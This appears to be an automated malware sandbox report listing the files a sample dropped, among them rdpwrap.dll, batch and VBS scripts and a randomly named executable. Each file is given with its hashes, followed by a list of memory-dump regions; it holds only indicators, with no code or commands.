MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\Services\rdpwrap.dllMD5
461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
C:\Program Files\Common Files\Services\rdpwrap.iniMD5
aada14668a752e946ec217cd05914107
SHA1712bfebbe7cea17865cb5eff8ea227d1dd930e4d
SHA256866c1ae68b4f1e77dc894289895bf83036028ab6dc2aefcb310d3f80fa705589
SHA512f1c8485defdc8f1acb9246ac26b0e0425ddd268fbc22a8ffc894d157273841888d617e10981304b2810cd615dd21e9ebaa76c158ad49c8077397f3fc5da8cfbb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.batMD5
296ddd4ff315bc654ef9a115e6d00927
SHA127a1a3ae50c560a7635b826b77b2bea3c649d11a
SHA25676458f40126c21a890e97da5bd20b219c2eb83cc4171d958335d5fcc22f3860b
SHA5121a793e98413253f59b36d3e13c90821645e4f0b3d9c81959cbcd3cfd09a60298b974ea7cc77a420668f35766b17766e8b07a68189b40aabbd4adde26b81a4574
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\lst.vbsMD5
4c9bf0719250bbbf5a44ad421e0c00f4
SHA1dd686bfa711732d30611b0bdcc1f270ba3828180
SHA25612bc4a0eae0555b0850cb271bae5cc660bf7551750e3c7ae9a0fb7843e0d302f
SHA512d5dce8489a39c0e44c6f77f154f0caa3ce51ffe345d0862ccdf594711ea2b45c4aa5fe61a4a50ba5de2612fa7752971186281426f8a841d8e03b24cb895b85d0
-
C:\Users\Public\iv3yydjq.exeMD5
b28986509331c265eefa7c7300fa0227
SHA1582fe31db734e32946fd4ea52fe4bcc12864f120
SHA2562075b6cc6c3d8b4c0540208f6ec590c1d8b3d74d9294a17fb1790afd5222b161
SHA5124369599d07437cb3d9e6ab9cf54beead697aafc277c7c243b2d8fdd59e9844ca58be8a1aae43d22a9588f1c65be0d47f2ab93b81fde90aeab1b5a438f1a3b6d6
-
\??\PIPE\lsarpcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\samrMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\Users\Public\iv3yydjq.exeMD5
b28986509331c265eefa7c7300fa0227
SHA1582fe31db734e32946fd4ea52fe4bcc12864f120
SHA2562075b6cc6c3d8b4c0540208f6ec590c1d8b3d74d9294a17fb1790afd5222b161
SHA5124369599d07437cb3d9e6ab9cf54beead697aafc277c7c243b2d8fdd59e9844ca58be8a1aae43d22a9588f1c65be0d47f2ab93b81fde90aeab1b5a438f1a3b6d6
-
\??\c:\Users\Public\qpcxh2bd.infMD5
1cdc414cdbc6b9ffd3c28c8d9057424a
SHA1dc541c5244f9b09d63a250ca11ac36428b902437
SHA25681e1cc88e49fef04a6b8d8172e1cde4e9b014240a9bdc8bde66898c1b7424ee4
SHA512a1518a8ec921e105093313d862b3e3ffe0bc2a2ff63a59c8c67082b5b8cdf931b0488d72c857ac551e9d49f4baaf0dd4e9278e346b6be8b7b7b0c2fb0a9e43a9
-
memory/744-60-0x0000000000D86000-0x0000000000DA5000-memory.dmpFilesize
124KB
-
memory/744-55-0x000007FEF57CE000-0x000007FEF57CF000-memory.dmpFilesize
4KB
-
memory/744-57-0x000007FEF2920000-0x000007FEF39B6000-memory.dmpFilesize
16.6MB
-
memory/744-56-0x0000000000D80000-0x0000000000D82000-memory.dmpFilesize
8KB
-
memory/1288-59-0x000007FEFBEB1000-0x000007FEFBEB3000-memory.dmpFilesize
8KB
-
memory/1544-65-0x0000000075321000-0x0000000075323000-memory.dmpFilesize
8KB